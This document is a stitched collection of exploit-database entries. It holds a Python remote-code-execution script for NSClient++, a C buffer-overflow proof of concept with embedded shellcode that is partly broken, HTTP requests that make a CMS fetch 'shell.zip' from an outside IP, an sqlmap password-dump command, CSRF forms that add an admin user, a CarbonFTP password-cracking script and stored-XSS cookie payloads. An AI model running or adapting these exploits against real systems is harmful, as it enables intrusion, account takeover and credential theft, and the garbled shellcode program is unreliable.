# Exploit Title: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-04-20
# Exploit Author: kindredsec
# Vendor Homepage: https://nsclient.org/
# Software Link: https://nsclient.org/download/
# Version: 0.5.2.35
# Tested on: Microsoft Windows 10 Pro (x64)
# CVE: N/A
#
# NSClient++ is a monitoring agent that has the option to run external scripts.
# This feature can allow an attacker, given they have credentials, the ability to execute
# arbitrary code via the NSClient++ web application. Since it runs as NT Authority/System bt
# Default, this leads to privileged code execution.

#!/usr/bin/env python3

import requests
from bs4 import BeautifulSoup as bs
import urllib3
import json
import sys
import random
import string
import time
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def generateName():

  letters = string.ascii_lowercase + string.ascii_uppercase
  return ''.join(random.choice(letters) for i in range(random.randint(8,13)))

def printStatus(message, msg_type):

  C_YELLOW = '\033[1;33m'
  C_RESET = '\033[0m'
  C_GREEN = '\033[1;32m'
  C_RED = '\033[1;31m'

  if msg_type == "good":
    green_plus = C_GREEN + "[+]" + C_RESET 
    string = green_plus + "" + message

  elif msg_type == "info":
    yellow_ex = C_YELLOW + "[!]" + C_RESET
    string = yellow_ex + "" + message

  elif msg_type == "bad":
    red_minus = C_RED + "[-]" + C_RESET
    string = red_minus + "" + message

  print(string)


# This function adds a new external script containing the desired
# command, then saves the configuration
def configurePayload(session, cmd, key):

  printStatus("Configuring Script with Specified Payload . . .", "info")
  endpoint = "/settings/query.json"
  node = { "path" : "/settings/external scripts/scripts",
"key" : key } 
  value = { "string_data" :  cmd }
  update = { "node" : node , "value" : value }
  payload = [ { "plugin_id" : "1234",
"update" :  update } ] 
  json_data = { "type" : "SettingsRequestMessage", "payload" : payload }

  out = session.post(url = base_url + endpoint, json=json_data, verify=False)
  if "STATUS_OK" not in str(out.content):
    printStatus("Error configuring payload. Hit error at: "  + endpoint, "bad")
    sys.exit(1)

  printStatus("Added External Script (name: " + key + ")", "good")
  time.sleep(3)
  printStatus("Saving Configuration . . .", "info")
  header = { "version" : "1" }
  payload = [ { "plugin_id" : "1234", "control" : { "command" : "SAVE" }} ]
  json_data = { "header" : header, "type" : "SettingsRequestMessage", "payload" : payload }

  session.post(url = base_url + endpoint, json=json_data, verify=False)  


# Since the application needs to be restarted after making changes,
# this function reloads the application, and waits for it to come back.
def reloadConfig(session):

  printStatus("Reloading Application . . .", "info")
  endpoint = "/core/reload"
  session.get(url = base_url + endpoint, verify=False)

  # Wait until the application successfully reloads by making a request
  # every 10 seconds until it responds.
  printStatus("Waiting for Application to reload . . .", "info")
  time.sleep(10)
  response = False
  count = 0 
  while not response:
    try:
      out = session.get(url = base_url, verify=False, timeout=10)
      if len(out.content) > 0:
        response = True
    except:
      count += 1
      if count > 10:
        printStatus("Application failed to reload. Nice DoS exploit! /s", "bad")
        sys.exit(1)
      else:
        continue  


# This function makes the call to the new external script to
# ultimately execute the code.
def triggerPayload(session, key):

  printStatus("Triggering payload, should execute shortly . . .", "info")
  endpoint = "/query/" + key
  try:
    session.get(url = base_url + endpoint, verify=False, timeout=10)
  except requests.exceptions.ReadTimeout:
    printStatus("Timeout exceeded. Assuming your payload executed . . .", "info")
    sys.exit(0)


# Before setting up the exploit, this function makes sure the
# required feature (External Scripts) is enabled on the application.
def enableFeature(session):

  printStatus("Enabling External Scripts Module . . .", "info")
  endpoint = "/registry/control/module/load"
  params = { "name" : "CheckExternalScripts" }
  out = session.get(url = base_url + endpoint, params=params, verify=False)
  if "STATUS_OK" not in str(out.content):
    printStatus("Error enabling required feature. Hit error at: "  + endpoint, "bad")
    sys.exit(1)


# This function obtains an authentication token that gets added to all
# remaining headers.
def getAuthToken(session):

  printStatus("Obtaining Authentication Token . . .", "info")
  endpoint = "/auth/token"
  params = { "password" : password }
  auth = session.get(url = base_url + endpoint, params=params, verify=False)  
  if "auth token" in str(auth.content):
    j = json.loads(auth.content)
    authToken = j["auth token"]
    printStatus("Got auth token: " + authToken, "good")
    return authToken
  else:
    printStatus("Error obtaining auth token, is your password correct? Hit error at: "  + endpoint, "bad")
    sys.exit(1)



parser = argparse.ArgumentParser("NSClient++ 0.5.2.35 Authenticated RCE")
parser.add_argument('-t', nargs='?', metavar='target', help='Target IP Address.')
parser.add_argument('-P', nargs='?', metavar='port', help='Target Port.')
parser.add_argument('-p', nargs='?', metavar='password', help='NSClient++ Administrative Password.')
parser.add_argument('-c', nargs='?', metavar='command', help='Command to execute on target')
args = parser.parse_args()

if len(sys.argv) < 4:
  parser.print_help()
  sys.exit(1)

# Build base URL, grab needed arguments
base_url = "https://" + args.t + ":" + args.P
printStatus("Targeting base URL " + base_url, "info")
password = args.p
cmd = args.c

# Get first auth token, and add it to headers of session
s = requests.session()
token = getAuthToken(s)
s.headers.update({ "TOKEN" : token})

# Generate a random name, enable the feature, add the payload,
# then reload.
randKey = generateName()
enableFeature(s)
configurePayload(s, cmd, randKey)
reloadConfig(s)

# Since application was reloaded, need a new auth token.
token = getAuthToken(s)
s.headers.update({ "TOKEN" : token})

# Execute our code.
triggerPayload(s, randKey)

# Exploit Title: Spiderman2  - Buffer Overflow
# Exploit Author: HexraiN
# Vendor Homepage: https://www.mobygames.com/company/fizz-factor
# Software Link: https://www.mobygames.com/game/spider-man-2-the-game
# Version: 2.1.1
# Tested on: Windows 10 x64
# Greetz : OA Cybersecurity Labs

#Twitter : @smashedkernel

# 1 -> Close DEP for Spiderman.exe
# 2 -> Remove /Your Spiderman Installed File /Movies/ACTIVISN.bik
# 3 -> Change the shellcode with the one you want
# 4 -> Change "installation_path" by yourself.
# 5 -> Compile & Run PoC
# 6 -> Run Game Spiderman.exe
# 7 -> Boom


#include <stdlib.h>
#include <stdio.h>
#include <string.h>

unsigned char shellcode[] =

# msfvenom -p windows/exec CMD=notepad -e x64/alpha_mixed -f c  -v

// SIZE = 192 Bytes

"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
"\x00\x53\xff\xd5\x6e\x6f\x74\x65\x70\x61\x64\x00";



    void main(void)
    {
     unsigned char *installation_path[] = "C:\\Program
Files(x86)\\Activision\\Spider-Man 2";
     strcpy(installation_path,"\\Movies\\ACTIVISN.bik");

     char buffer[421];
     FILE *vulnerable;

     memset(&buffer, 0x90, 421);

    long addr = 0xbffff240 + 0xc0;    // address to insert into eip ==
address of local buffer in bof + ~192 bytes into nops
    memcpy(buffer + 28, &addr, sizeof(long)); // buffer offset at 28 =
location of rip register

    memcpy(buffer + sizeof(buffer) - sizeof(shellcode) - 1, shellcode,
sizeof(shellcode));

    vulnerable = fopen(installation_path, "w");
    fwrite(buffer, 421, 1, vulnerable);
    fclose(vulnerable);
}

# Exploit Title: jizhi CMS 1.6.7 - Arbitrary File Download
# Google Dork: jizhicms
# Date: 2020-04-18
# Exploit Author: iej1ctk1g
# Vendor Homepage: https://www.jizhicms.cn/
# Software Link: http://down.jizhicms.cn/jizhicms_Beta1.6.7.zip
# Version: 1.6.7
# Tested on： Mac OS
# CVE : N/A

Data 1.

POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.253:8888
Content-Length: 86
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.253:8888
Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
Connection: close

action=start-download&filepath=shell&download_url=http://39.105.143.130:9090/shell.zip


Data 2.

POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.253:8888
Content-Length: 32
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.253:8888
Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
Connection: close

action=file-upzip&filepath=shell

# Exploit Title: Sysaid 20.1.11 b26 - Remote Command Execution
# Google Dork: intext:"Help Desk Software by SysAid <http://www.sysaid.com/>"
# Date: 2020-03-09
# Exploit Author: Ahmed Sherif
# Vendor Homepage: https://www.sysaid.com/free-help-desk-software
# Software Link: [https://www.sysaid.com/free-help-desk-software
# Version:  Sysaid v20.1.11 b26
# Tested on: Windows Server 2016
# CVE : CVE-2020-10569

GhostCat Attack

The default
installation of Sysaid is enabling the exposure of AJP13 protocol which is used
by tomcat instance, this vulnerability has been released recently on
different blogposts
<https://www.zdnet.com/article/ghostcat-bug-impacts-all-apache-tomcat-versions-released-in-the-last-13-years/>.


*Proof-of-Concept*

[image: image.png]

*Unauthenticated File Upload
*
It was found on the Sysaid application that an attacker would be able
to upload files without authenticated by directly access the below
link:
http://REDACTED:8080/UploadIcon.jsp?uploadChatFile=true&parent=



In the above screenshot, it shows that an attacker can execute commands
in the system without any prior authentication to the system.

# Exploit Title: PMB 5.6 - 'logid' SQL Injection
# Google Dork: inurl:opac_css
# Date: 2020-04-20
# Exploit Author: 41-trk (Tarik Bakir)
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 5.6 

-==== Software Description ====-

PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products.
We are some librarians, users and developers deploring this state of affairs.

PMB is based on web technology. This is what we sometimes call a 'web-app'.
PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language.

The main functions of PMB are :

    * Supporting the UNIMARC format
    * Authorities management (authors, publishers, series, subjects...)
    * Management of loans, holds, borrowers...
    * A user-friendly configuration
    * The ability to import full bibliographic records
    * A user-friendly OPAC integrating a browser
    * Loans management with a module designed to serve even the very small establishments
    * Serials management
    * Simple administration procedures that can be handled easily even by the library staff...

-==== Vulnerability ====-

Variable $logid isn't properly sanitized in file /admin/sauvegarde/download.php, which allows ADMINISTRATION_AUTH to execute arbitrary SQL commands via the id parameter.

-==== POC ====-

http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1 [SQLI]

Using SQLMAP :

./sqlmap.py -u "http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1" -p logid --headers="Cookie: [VALID_USER_COOKIE]" --passwords

-==== Exploit requirements ====-

- You will need to be logged in in order to exploit the vulnerability.

<!--


P5 FNIP-8x16A/FNIP-4xSH CSRF Stored Cross-Site Scripting


Vendor: P5
Product web page: https://www.p5.hu
Affected version: 1.0.20, 1.0.11

Summary: The FNIP-8x16A is an eight channel relay module used for switching any
type of load that doesn’t exceed the specifications. Via its built-in web site
and TCP/IP communication, the outputs and inputs can be controlled and monitored
from standard network capable devices such as computers, smartphones, web-tablets,
etc. either locally or via the network. The module can be used independently or
as part of a complex control system in residential and commercial installations.

Desc: The controller suffers from CSRF and XSS vulnerabilities. The application
allows users to perform certain actions via HTTP requests without performing any
validity checks to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits a malicious web
site. Input passed to several GET/POST parameters is not properly sanitised before
being returned to the user. This can be exploited to execute arbitrary HTML and
script code in a user's browser session in context of an affected site.

Tested on: Linux
           CGI


Vulnerabiity discovered by Gjoko 'LiquidWorm' Krstic
                           @zeroscience


Advisory ID: ZSL-2020-5564
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5564.php


29.01.2020

-->


<!-- CSRF add admin user -->
<html>
<body>
<form action="http://192.168.1.17:83/user.cgi" method="POST">
<input type="hidden" name="uno" value="1" />        <!-- User number (user1) -->
<input type="hidden" name="un" value="testingus" /> <!-- Username -->
<input type="hidden" name="role" value="2" />       <!-- 2: Admin, 1: Actor, 0: Observer -->
<input type="hidden" name="enabled" value="1" />
<input type="hidden" name="pw" value="123456" />
<input type="hidden" name="pw2" value="123456" />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>

<!-- CSRF change admin password -->
<html>
<body>
<form action="http://192.168.1.17:83/user.cgi" method="POST">
<input type="hidden" name="un" value="admin" /> <!-- Defaults: admin:futurenow -->
<input type="hidden" name="pw" value="123456" />
<input type="hidden" name="pw2" value="123456" />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>

<!-- XSS modify labels -->
<html>
<body>
<form action="http://192.168.1.17:83/config.html" method="POST">
<input type="hidden" name="lab1" value="Channel1" />
<input type="hidden" name="lab2" value="Channel2" />
<input type="hidden" name="lab3" value="Channel3" />
<input type="hidden" name="lab4" value='"><script>confirm(251)</script>' />
<input type="hidden" name="lab12" value="etc." />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>

import time, string, sys, argparse, os, codecs

#Fixed: updated for Python 3, the hex decode() function was not working in Python 3 version.
#This should be compatible for Python 2 and 3 versions now, tested successfully.
#Sample test password 
#LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947 

key="97F"  #2431 in decimal, the weak hardcoded encryption key within the vuln program.
chunk_sz=5 #number of bytes we must decrypt the password by.

#Password is stored here:
#C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects\<FILE>.CFTP

#Neowise CarbonFTP v1.4
#Insecure Proprietary Password Encryption
#By John Page (aka hyp3rlinx)
#Apparition Security
#===================================================

def carbonftp_conf(conf_file):
    p=""
    pipe=-1
    passwd=""
    lst_of_passwds=[]
    try:
        for p in conf_file:
            idx = p.find("Password=STRING|")
            if idx != -1:
                pipe = p.find("|")
                if pipe != -1:
                    passwd = p[pipe + 2: -2]
                    print(" Password found: "+ passwd)
                    lst_of_passwds.append(passwd) 
    except Exception as e:
        print(str(e))
    return lst_of_passwds 


def reorder(lst):
    k=1
    j=0
    for n in range(len(lst)):
        k+=1
        j+=1
        try:
            tmp = lst[n+k]
            a = lst[n+j]
            lst[n+j] = tmp
            lst[n+k] = a
        except Exception as e:
            pass
    return ''.join(lst)


def dec2hex(dec):
    tmp = str(hex(int(dec)))
    return str(tmp[2:])


#Updated for Python version compatibility.
def hex2ascii(h):
    h=h.strip()
    passwd=""
    try:
        passwd = codecs.decode(h, "hex").decode("ascii")
    except Exception as e:
        print("[!] In hex2ascii(), not a valid hex string.")
        exit()
    return passwd


def chunk_passwd(passwd_lst):
    lst = []
    for passwd in passwd_lst:
        while passwd:
            lst.append(passwd[:chunk_sz])
            passwd = passwd[chunk_sz:]
    return lst


def strip_non_printable_char(str):
  return ''.join([x for x in str if ord(x) > 31 or ord(x)==9])

cnt = 0
passwd_str=""
def deob(c):

    global cnt, passwd_str

    tmp=""

    try:
        tmp = int(c) - int(key, 16)
        tmp = dec2hex(tmp)
    except Exception as e:
        print("[!] Not a valid CarbonFTP encrypted password.")
        exit()

    b=""
    a=""

     #Seems we can delete the second char as its most always junk.
    if cnt!=1:
        a = tmp[:2]
        cnt+=1
    else:
        b = tmp[:4]

    passwd_str += strip_non_printable_char(hex2ascii(a + b))
    hex_passwd_lst = list(passwd_str)
    return hex_passwd_lst


def no_unique_chars(lst):
    c=0
    k=1
    j=0
    for i in range(len(lst)):
        k+=1
        j+=1
        try:
            a = lst[i]
            b = lst[i+1]
            if a != b:
                c+=1
            elif c==0:
                print("[!] Possible one char password?: " +str(lst[0]))
                return lst[0]
        except Exception as e:
            pass
    return False


def decryptor(result_lst):

    global passwd_str, sz

    print(" Decrypting ... \n")
    for i in result_lst:
        print("[-] "+i)
        time.sleep(0.1)
        lst = deob(i)

    #Re-order chars to correct sequence using custom swap function (reorder).
    reordered_pass = reorder(lst)
    sz = len(reordered_pass)

    #Flag possible single char password.
    no_unique_chars(lst)

    print("[+] PASSWORD LENGTH: " + str(sz))
    if sz == 9:
        return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-3] + " | " + reordered_pass[:-4] + " | " +
                reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass)

    #Shorter passwords less then nine chars will have several candidates
    #as they get padded with repeating chars so we return those.

    passwd_str=""
    return reordered_pass


def display_cracked_passwd(sz, passwd):
    if sz==9:
        print("[*] PASSWORD CANDIDATES: "+ passwd + "\n")
    else:
        print("[*] DECRYPTED PASSWORD: "+passwd + "\n")


def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files")
    parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password")
    return parser.parse_args()


def main(args):

    global passwd_str, sz
    victim=""

    if args.user and args.encrypted_password:
        print("[!] Supply a victims username -u or single encrypted password -p, not both.")
        exit()

    print("[+] Neowise CarbonFTP v1.4")
    time.sleep(0.1)
    print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption")
    time.sleep(0.1)
    print("[+] Version 2 Exploit fixed for Python 3 compatibility")
    time.sleep(0.1)
    print("[+] Discovered and cracked by hyp3rlinx")
    time.sleep(0.1)
    print("[+] ApparitionSec\n")
    time.sleep(1)

    #Crack a dir of carbonFTP conf files containing encrypted passwords -u flag.
    if args.user:
        victim = args.user
        os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/")
        dir_lst = os.listdir(".")
        for c in dir_lst:
            f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r")
            #Get encrypted password from conf file
            passwd_enc = carbonftp_conf(f)
            #Break up into 5 byte chunks as processed by the proprietary decryption routine.
            result_lst = chunk_passwd(passwd_enc)
            #Decrypt the 5 byte chunks and reassemble to the cleartext password.
            cracked_passwd = decryptor(result_lst)
            #Print cracked password or candidates.
            display_cracked_passwd(sz, cracked_passwd)
            time.sleep(0.3)
            passwd_str=""
            f.close()


    #Crack a single password -p flag.
    if args.encrypted_password:
        passwd_to_crack_lst = []
        passwd_to_crack_lst.append(args.encrypted_password)
        result = chunk_passwd(passwd_to_crack_lst)
        #Print cracked password or candidates.
        cracked_passwd = decryptor(result)
        display_cracked_passwd(sz, cracked_passwd)


if __name__=="__main__":

    parser = argparse.ArgumentParser()

    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        exit()

    main(parse_args())

Document Title:
===============
Mahara v19.10.2 CMS - Persistent Cross Site Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2217


Release Date:
=============
2020-04-21


Vulnerability Laboratory ID (VL-ID):
====================================
2217


Common Vulnerability Scoring System:
====================================
4.3


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
A fully featured electronic portfolio, weblog, resume builder and social
networking system, connecting users and creating
online communities. Mahara is designed to provide users with the tools
to create a personal and professional learning
and development environment.

(Copy of the Homepage: https://launchpad.net/mahara & https://mahara.org/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent
cross site vulnerability in the Mahara v19.10.2 CMS web-application.


Affected Product(s):
====================
Catalyst IT Ltd.
Product: Mahara v19.10.2 - CMS (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2020-04-21: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official Mahara v19.10.2 CMS web-application series.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser
to web-application requests from the application-side.

The persistent vulnerability is located in the `nombre` and
`descripción` parameters of the `Ficheros` module in the
`groupfiles.php` file.
Remote attackers with low privileges are able to inject own malicious
persistent script code as files and foldernames. The injected code can
be used to attack the frontend or backend of the web-application. The
request method to inject is POST and the attack vector is located on
the application-side. Files are able to be reviewed in the backend by
higher privileged accounts and can be shared.

Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application
modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Ficheros (Files Manager)

Vulnerable Input(s):
[+] Crear Carpeta

Vulnerable File(s):
[+] groupfiles.php


Vulnerable Parameter(s):
[+] nombre
[+] descripción

Affected Module(s):
[+] Página principal


Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by low privileged web
application user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Manual steps to reproduce ...
1. Open the web-application and login as regular user
2. Move inside the mygroup management
3. Open the ficheros tab on top
4. Inject test payload into the crear carpeta (Nombre & Descripción)
input field for the página principal to output
Note: The execution point occurs on edit, list and delete interaction
5. The created path listings are available for higher privileged user
account that review (Backend)
6. Successul reproduce of the persistent cross site web vulnerability!


PoC: Vulnerable Source (Inject via Crear Carpeta Input for Página Principal)
<tr id="file:7191" class="file-item folder no-hover ui-droppable">
<td class="icon-cell">
<div class="icon-drag ui-draggable ui-draggable-handle" id="drag:7191"
tabindex="0">
<span class="sr-only">Seleccionar y arrastrar para mover >"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe></span>
<span class="icon-folder-open icon icon-lg " role="presentation"
aria-hidden="true"></span>
</div></td>
<td class="filename">
<a
href="https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=7191&owner=group&ownerid=27"

id="changefolder:7191" class="inner-link changefolder">
<span class="sr-only">Carpeta:</span>
<span class="display-title ">>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe></span>
</a></td>
<td class="filedescription d-none d-md-table-cell">
>"<iframe></iframe>     >"<iframe></iframe></td>
<td class="filesize"></td>
<td class="filedate">20/04/2020</td>
<!-- Ensure space for 3 buttons (in the case of a really long single
line string in a user input field -->
<td class="text-right control-buttons ">
<div class="btn-group">
...  ...
<button name="files_filebrowser_edit[7191]" class="btn btn-secondary
btn-sm">
<span class="icon icon-pencil-alt icon-lg" role="presentation"
aria-hidden="true"></span>
<span class="sr-only">Edit folder ">"<iframe
src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>"</span></button>
<button name="files_filebrowser_delete[7191]" class="btn btn-secondary
btn-sm">
<span class="icon icon-trash-alt text-danger icon-lg"
role="presentation" aria-hidden="true"></span>
<span class="sr-only">Delete folder ">"<iframe
src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>"</span>
</button></div></td>


--- PoC Session Logs [POST] --- (Mygroup Ficheros)
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27
Host: mahara_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------98107146915324237501974151621
Content-Length: 4879
Origin: https://mahara_cms.localhost:8080
Connection: keep-alive
Referer:
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27
Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558;
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página
principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=&
files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0&
files_filebrowser_edit_title=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>    >"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_description=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on&
files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=&
files_filebrowser_edit_licensor=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>   >"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_licensorurl=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_allowcomments=on&
files_filebrowser_update[7191]=Guardar
cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1
-
POST: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
cache-control: no-store, no-cache, must-revalidate
set-cookie:
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
path=/; secure; HttpOnly
content-encoding: br
X-Firefox-Spdy: h2-
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=
-
Host: mahara_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------126319663526561351602937008964
Content-Length: 3721
Origin: https://mahara_cms.localhost:8080
Connection: keep-alive
Referer:
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=
Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558;
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página
principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=&
files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=&
files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=&
sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
cache-control: no-store, no-cache, must-revalidate
set-cookie:
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
path=/; secure; HttpOnly
content-encoding: br
X-Firefox-Spdy: h2


Reference(s):
https://mahara_cms.localhost:8080/artefact/
https://mahara_cms.localhost:8080/artefact/file/
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php


Security Risk:
==============
The security risk of the persistent cross site scripting web
vulnerability in the web-application is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
